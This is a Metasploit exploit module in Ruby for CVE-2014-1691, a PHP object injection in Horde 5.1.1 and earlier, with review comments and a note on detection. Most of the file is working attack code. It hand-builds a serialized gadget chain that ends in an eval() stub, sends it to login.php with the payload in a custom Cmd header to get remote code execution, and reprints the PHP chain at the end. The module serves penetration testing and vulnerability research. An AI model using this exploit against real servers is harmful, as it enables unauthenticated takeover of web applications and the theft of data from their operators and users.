##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Module metadata for an unauthenticated PHP object-injection (unserialize())
  # exploit against Horde <= 5.1.1, CVE-2014-1691. The only option registered
  # here is TARGETURI, the base path of the Horde install (default "/horde/");
  # everything else (RHOSTS, RPORT, SSL, ...) comes from the HttpClient mixin.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Horde Framework Unserialize PHP Code Execution',
        'Description' => %q{
          This module exploits a php unserialize() vulnerability in Horde <= 5.1.1 which could be
          abused to allow unauthenticated users to execute arbitrary code with the permissions of
          the web server. The dangerous unserialize() exists in the 'lib/Horde/Variables.php' file.
          The exploit abuses the __destruct() method from the Horde_Kolab_Server_Decorator_Clean
          class to reach a dangerous call_user_func() call in the Horde_Prefs class.
        },
        'Author' => [
          'EgiX', # Exploitation technique and Vulnerability discovery (originally reported by the vendor)
          'juan vazquez' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2014-1691' ],
          [ 'URL', 'http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection' ],
          [ 'URL', 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=737149' ],
          # Upstream fix commit; the reference a defender should use to confirm a
          # deployed Horde is patched.
          [ 'URL', 'https://github.com/horde/horde/commit/da6afc7e9f4e290f782eca9dbca794f772caccb3' ]
        ],
        'Privileged' => false,
        'Platform' => ['php'],
        'Arch' => ARCH_PHP,
        'Payload' => {
          'DisableNops' => true
        },
        'Targets' => [ ['Horde 5', {}], ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2013-06-27',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [ true, "The base path to Horde", "/horde/"])
      ]
    )
  end

  # Vulnerability probe. A random alphabetic marker (20-29 chars) is printed
  # by a harmless PHP snippet sent through the same request builder exploit()
  # uses, and the response body is searched for it. Note that this is an
  # active check: it already exercises the unserialize() path on the target.
  #
  # @return [Exploit::CheckCode] Vulnerable when the marker is echoed back,
  #   Safe otherwise (nil response and empty body both count as Safe)
  def check
    flag = rand_text_alpha(rand(10) + 20)
    res = send_request_exploit("print #{flag};die;")
    # `flag` is purely alphabetic (rand_text_alpha), so interpolating it into a
    # Regexp cannot introduce metacharacters. NOTE(review): `and` is the
    # low-precedence keyword; it is harmless inside an `if` condition, but `&&`
    # is the idiomatic form.
    if res and res.body and res.body.to_s =~ /#{flag}/
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  # Entry point. Re-runs check() and aborts with Failure::NotVulnerable unless
  # the marker round-trips, then sends the framework-encoded PHP payload
  # through the same request builder.
  def exploit
    print_status("Testing injection...")
    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, "#{peer} - Target isn't vulnerable, exiting...")
    end

    print_status("Exploiting the unserialize()...")
    send_request_exploit(payload.encoded)
  end

  # Builds and sends the single HTTP request that carries the attack.
  #
  # @param p [String] PHP source to run on the target. It travels
  #   base64-encoded in a custom `Cmd` request header (PHP exposes request
  #   headers as $_SERVER['HTTP_<NAME>']), and the stub below decodes and
  #   eval()s it.
  # @return the result of send_request_cgi; check() treats nil as not
  #   vulnerable
  #
  # The POST field `_formvars` carries a hand-built serialize() blob -- the
  # EgiX POP chain documented in the =begin/=end block at the bottom of this
  # file: a Horde_Kolab_Server_Decorator_Clean whose private _server is a
  # Horde_Prefs_Identity -> Horde_Prefs -> Horde_Config chain, with the PHP stub
  # stored in Horde_Config's _oldConfig. In PHP's serialize() format a
  # protected property is spelled "\x00*\x00name" and a private one
  # "\x00Class\x00name", so the NUL bytes are part of the wire format, not
  # padding, and the s:<len>: prefixes must match byte counts exactly.
  #
  # Defensive note: the observable request shape -- a POST to
  # <TARGETURI>login.php whose `_formvars` value begins
  # `O:34:"Horde_Kolab_Server_Decorator_Clean"` and which carries a
  # non-standard `Cmd` header -- is what a WAF rule or access-log review can
  # key on; the vendor commit listed under 'References' is the upstream fix.
  def send_request_exploit(p)
    # Pure ASCII, so String#length equals the byte length PHP expects in s:N:.
    php_injection = "eval(base64_decode($_SERVER[HTTP_CMD]));die();"

    # NOTE(review): `<<` mutates the string literal in place; this relies on the
    # file NOT having `# frozen_string_literal: true`.
    payload_serialized = "O:34:\"Horde_Kolab_Server_Decorator_Clean\":2:{s:43:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_server\";"
    payload_serialized << "O:20:\"Horde_Prefs_Identity\":2:{s:9:\"\x00*\x00_prefs\";O:11:\"Horde_Prefs\":2:{s:8:\"\x00*\x00_opts\";a:1:{s:12:\"sizecallback\";"
    payload_serialized << "a:2:{i:0;O:12:\"Horde_Config\":1:{s:13:\"\x00*\x00_oldConfig\";s:#{php_injection.length}:\"#{php_injection}\";}i:1;s:13:\"readXMLConfig\";}}"
    payload_serialized << "s:10:\"\x00*\x00_scopes\";a:1:{s:5:\"horde\";O:17:\"Horde_Prefs_Scope\":1:{s:9:\"\x00*\x00_prefs\";a:1:{i:0;i:1;}}}}"
    payload_serialized << "s:13:\"\x00*\x00_prefnames\";a:1:{s:10:\"identities\";i:0;}}s:42:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_added\";a:1:{i:0;i:1;}}"

    send_request_cgi(
      {
        'uri' => normalize_uri(target_uri.path.to_s, "login.php"),
        'method' => 'POST',
        'vars_post' => {
          '_formvars' => payload_serialized
        },
        'headers' => {
          'Cmd' => Rex::Text.encode_base64(p)
        }
      }
    )
  end
end
=begin
PHP chain by EgiX: http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection
class Horde_Config
{
protected $_oldConfig = "phpinfo();die;";
}
class Horde_Prefs_Scope
{
protected $_prefs = array(1);
}
class Horde_Prefs
{
protected $_opts, $_scopes;
function __construct()
{
$this->_opts['sizecallback'] = array(new Horde_Config, 'readXMLConfig');
$this->_scopes['horde'] = new Horde_Prefs_Scope;
}
}
class Horde_Prefs_Identity
{
protected $_prefs, $_prefnames;
function __construct()
{
$this->_prefs = new Horde_Prefs;
$this->_prefnames['identities'] = 0;
}
}
class Horde_Kolab_Server_Decorator_Clean
{
private $_server, $_added = array(1);
function __construct()
{
$this->_server = new Horde_Prefs_Identity;
}
}
$popchain = serialize(new Horde_Kolab_Server_Decorator_Clean);
=end